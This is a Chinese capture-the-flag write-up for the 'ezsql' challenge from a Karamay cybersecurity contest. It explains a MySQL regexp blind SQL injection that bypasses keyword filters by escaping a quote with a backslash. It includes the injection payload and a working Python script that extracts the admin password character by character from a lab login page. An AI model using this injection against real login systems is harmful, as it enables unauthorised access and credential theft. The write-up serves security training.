ezsql

题目来源:克拉玛依市第一届网络安全技能大赛

0x01 解题思路

进入提示,发现要我们登陆,点击确定后跳转到了login.php目录。

通过探测发现过滤了select、union、'、"、、=、like、and等

username处加反斜杠转义单引号,造成逃逸,后面可控,成为注入点,payload:or password regexp binary {}#

利用regexp进行匹配猜测数据,还需要用binary关键字来区分大小写

题目的考点应该是本题考点为MySQL regexp盲注了。

0x02 解题脚本

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
import requests
import string

def str2hex(string):
  result = ''
  for i in string:
    result += hex(ord(i))
  result = result.replace('0x','')
  return '0x'+result

strs = string.ascii_letters+string.digits
url = "http://172.24.18.80/ezsql/login.php"
headers = {
    'User-Agent':'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:74.0) Gecko/20100101 Firefox/74.0'
}
payload = 'or password regexp binary {}#'
if __name__ == "__main__":
    name = ''
    for i in range(1,40):
        for j in strs:
            passwd = str2hex('^'+name+j)
            payloads = payload.format(passwd)
            postdata={
                'username':'admin\\',
                'password':payloads
            }
            r = requests.post(url,data=postdata,headers=headers)
            if "Maybe you are right" in r.text:
                name += j
                print(j,end='')
                break